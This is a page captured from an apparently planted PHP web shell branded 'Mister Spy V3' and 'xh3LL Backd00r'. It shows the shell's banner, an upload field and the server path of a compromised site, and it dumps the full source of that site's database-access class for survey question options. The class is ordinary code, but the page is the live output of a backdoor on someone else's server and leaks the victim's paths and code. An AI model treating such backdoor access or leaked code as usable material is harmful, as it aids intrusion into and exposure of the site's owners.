Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/web/library/
Upload File :
Current File : /home/caballoscriollos/public_html/web/library/class.preguntasopciones.php

<?php 

require_once('class.dbaccess.php');
require_once('class.preguntaopcion.php');
require_once('class.filter.php');
require_once('class.page.php');

class PreguntasOpciones extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		$sql = '';
		
		$sql.= " WHERE Nombre LIKE '%" . DB::StringUnquoted($filter['Nombre']) . "%'";
		
		return $sql;
	}


	public function GetPagesCount(Page $oPage, $filter = false)
	{	
		$sql = "SELECT COUNT(1) / " . DB::Number($oPage->Size) . " AS Count";
		$sql.= " FROM tblPreguntasOpciones";
		
		if ($filter)
			$sql.= " " . $this->ParseFilter($filter);
		
		if (!($oRes = $this->GetQuery($sql)) )		
			return false;

		if ( !($oRow = $oRes->GetRow()) )
			return false;
		
		$Count = $oRow['Count'];
		
		return ceil($Count);
	}


	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblPreguntasOpciones";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " ORDER BY IdPreguntaOpcion";

		if ($oPage != NULL)
			$sql.= " " . Pageable::ParsePage($oPage);
						
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oPreguntaOpcion = new PreguntaOpcion();
			$oPreguntaOpcion->ParseFromArray($oRow);
			
			array_push($arr, $oPreguntaOpcion);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}
	

	public function GetById($IdPreguntaOpcion)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblPreguntasOpciones";
		$sql.= " WHERE IdPreguntaOpcion = " . DB::Number($IdPreguntaOpcion);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oPreguntaOpcion = new PreguntaOpcion();
		$oPreguntaOpcion->ParseFromArray($oRow);
		
		return $oPreguntaOpcion;		
	}
	
	public function GetByIdPreguntaFormulario($IdPreguntaFormulario)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblPreguntasOpciones";
		$sql.= " WHERE IdPreguntaFormulario = " . DB::Number($IdPreguntaFormulario);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$arr = array();
			
		while ($oRow = $oRes->GetRow())	
		{	
			$oPreguntaOpcion = new PreguntaOpcion();
			$oPreguntaOpcion->ParseFromArray($oRow);
			
			array_push($arr, $oPreguntaOpcion);
			
			$oRes->MoveNext();
		}	
		
		return $arr;
	}

	
	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT *";
		$sql.= " FROM tblPreguntasOpciones";

		if ($filter)
			$sql.= $this->ParseFilter($filter);

		$sql.= " ORDER BY Nombre";
		
		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	
	
	public function Create(PreguntaOpcion $oPreguntaOpcion)
	{
		$arr = array
		(
			'IdPreguntaFormulario' 	=> DB::Number($oPreguntaOpcion->IdPreguntaFormulario),
			'Nombre' 				=> DB::String($oPreguntaOpcion->Nombre),
			'Multiplicador'			=> DB::Number($oPreguntaOpcion->Multiplicador)
		);
		
		if (!$this->Insert('tblPreguntasOpciones', $arr))
			return false;
			
		return $oPreguntaOpcion;
	}
	
	
	public function Update(PreguntaOpcion $oPreguntaOpcion)
	{
		$where = " IdPreguntaOpcion = " . DB::Number($oPreguntaOpcion->IdPreguntaOpcion);
		
		$arr = array
		(
			'IdPreguntaFormulario' 	=> DB::Number($oPreguntaOpcion->IdPreguntaFormulario),
			'Nombre' 				=> DB::String($oPreguntaOpcion->Nombre),
			'Multiplicador'			=> DB::Number($oPreguntaOpcion->Multiplicador)
		);
		
		if (!DBAccess::UpdateEntidad('tblPreguntasOpciones', $arr, $where))
			return false;
		
		return $oPreguntaOpcion;
	}
	

	public function Delete($IdPreguntaOpcion)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdPreguntaOpcion = " . DB::Number($IdPreguntaOpcion);
		if (!DBAccess::DeleteEntidad('tblPreguntasOpciones', $where))
		{
				DBAccess::$db->Rollback();	
				return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}
	

	public function DeleteByIdPreguntaFormulario($IdPreguntaFormulario)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdPreguntaFormulario = " . DB::Number($IdPreguntaFormulario);
		if (!DBAccess::DeleteEntidad('tblPreguntasOpciones', $where))
		{
				DBAccess::$db->Rollback();	
				return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}
	
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat